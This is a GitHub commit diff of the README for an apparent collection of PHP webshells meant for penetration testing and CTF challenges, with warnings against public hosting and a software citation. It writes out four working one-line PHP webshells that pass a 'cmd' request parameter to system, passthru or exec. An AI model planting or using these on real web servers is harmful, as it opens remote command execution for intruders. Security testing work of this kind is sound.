Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
3275ca0
commit 226a15d
Showing
1 changed file
with
33 additions
and
14 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,30 +1,49 @@ | ||
Contributing | ||
============ | ||
|
||
To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost). | ||
|
||
php-webshells | ||
PHP Webshells | ||
============= | ||
|
||
Common PHP shells. Do not put these on a publicly-accessible webserver. | ||
Common PHP shells is a collection of PHP webshells that you may need for your penetration testing (PT) cases or in a CTF challenge. | ||
|
||
Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to). | ||
|
||
These are provided for education purposes only and legitimate PT cases. | ||
|
||
I'll keep updating the collection whnever I stumble on any new webshell. | ||
|
||
FYI | ||
==== | ||
|
||
These are provided for education purposes only. | ||
|
||
Common php webshells. Do not host the file(s) in your server! | ||
For basic features, I recommend one-liners like : | ||
|
||
++++++++++++++++++++++++++ | ||
`<?php echo passthru($_GET['cmd']); ?>` | ||
|
||
Though I recommend one-liners like | ||
`<?php echo exec($_POST['cmd']); ?>` | ||
|
||
<?php echo passthru($_GET['cmd']); ?> | ||
`<?php system($_GET['cmd']); ?>` | ||
|
||
(Not a full fledged webshell, but works fine) | ||
`<?php passthru($_REQUEST['cmd']); ?>` | ||
|
||
================================================================= | ||
|
||
You can try WebHandler for one-liners. | ||
Cite: | ||
===== | ||
|
||
WebHandler.py works for POST and GET requests: | ||
``` | ||
@software{jacques_pharand_2020_3748072, | ||
author = {Jacques Pharand and | ||
John Troon and | ||
Javier Izquierdo Vera}, | ||
title = {JohnTroony/php-webshells: Collection CS1}, | ||
month = apr, | ||
year = 2020, | ||
publisher = {Zenodo}, | ||
version = {1.1}, | ||
doi = {10.5281/zenodo.3748072}, | ||
url = {https://doi.org/10.5281/zenodo.3748072} | ||
} | ||
<?php system($_GET['cmd']); ?> | ||
<?php passthru($_REQUEST['cmd']); ?> | ||
<?php echo exec($_POST['cmd']); ?> | ||
``` |